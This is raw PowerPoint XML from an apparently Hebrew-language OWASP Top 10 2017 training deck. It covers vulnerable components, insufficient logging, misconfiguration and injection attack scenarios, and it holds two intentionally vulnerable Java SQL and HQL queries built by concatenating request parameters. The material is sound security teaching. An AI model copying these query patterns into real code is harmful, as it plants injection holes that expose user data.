            <a:schemeClr val="accent4">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36577" tIns="66442" rIns="66441" bIns="48153" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="91440" lvl="1" algn="r" defTabSz="444500" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="15000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>רכיבים, כגון ספריות קוד, מסגרות עבודה, ומרכיבי תוכנה, רצים באותה הרשאה כגון היישום. במידה ומנצלים חולשה ברכיב פגיע, מתקפה שכזו עשויה לגרום לאובדן מידע או השתלטות על השרת עצמו. יישומים וממשקי פיתוח (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) המבוססים על רכיבים עם פגיעויות ידועות עשויים לחבל במנגנוני ההגנה של היישום ולאפשר מתקפות רבות.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Freeform 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{591F4221-9110-4B57-9D5B-633059706604}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5301114" y="7435423"/>
            <a:ext cx="1413251" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="83052" tIns="60192" rIns="83052" bIns="60192" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="533400" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A9:2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> - שימוש ברכיבים עם פגיעויות ידועות</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Freeform 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{49216BAC-D272-467A-B5B1-631A0C551A99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="98630" y="8298617"/>
            <a:ext cx="5218177" cy="611796"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4">
              <a:alpha val="90000"/>
              <a:tint val="40000"/>
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent4">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36577" tIns="66442" rIns="66441" bIns="48153" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="91440" lvl="1" algn="r" defTabSz="444500" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="15000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תיעוד וניטור בלתי מספקים, בשילוב עם העובדה שלא משלבים תהליכי טיפול באירועי אבטחת מידע, עשויות לאפשר לתוקפים להמשיך לתקוף מערכות, לשמור על התמדה, לגשת למערכות נוספות, ולחבל, לחלץ, או להשמיד מידע. חקירה של מרבית המתקפות מראה כי הזמן לגילוי מתקפה עומד על מעל 200 ימים, והמתקפות לרבות מתגלות ע"י צד ג' במקום ע"י תהליך פנימי או ניטור.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Freeform 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{AD39F83D-88CC-4839-86E9-886E3E768699}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5301114" y="8240115"/>
            <a:ext cx="1413251" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="83052" tIns="60192" rIns="83052" bIns="60192" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="533400" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A10:2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> - תיעוד וניטור בלתי מספקים</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{FA334A99-A6CF-4DF0-BB88-4F315BF4201A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5268852" y="5157065"/>
            <a:ext cx="1443106" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A6:2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> - ניהול תצורה לא מאובטח</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7058529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Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3466100" y="6372000"/>
            <a:ext cx="3383280" cy="2761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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>דוגמאות לתרחישי תקיפה</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תרחיש 1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> יישום משתמש במידע בלתי מאומת בבניית קריאת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>פגיעה</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  String query = "SELECT * FROM accounts WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>custID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("id") + "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תרחיש 2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> באופן דומה לתרחיש 1, יישום הסומך בצורה עיוורת במסגרות עבודה, עשוי להכיל שאילתות פגיעות (דוגמת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hibernate Query Language (HQL)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  Query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HQLQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>session.createQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("FROM accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>custID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("id") + "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
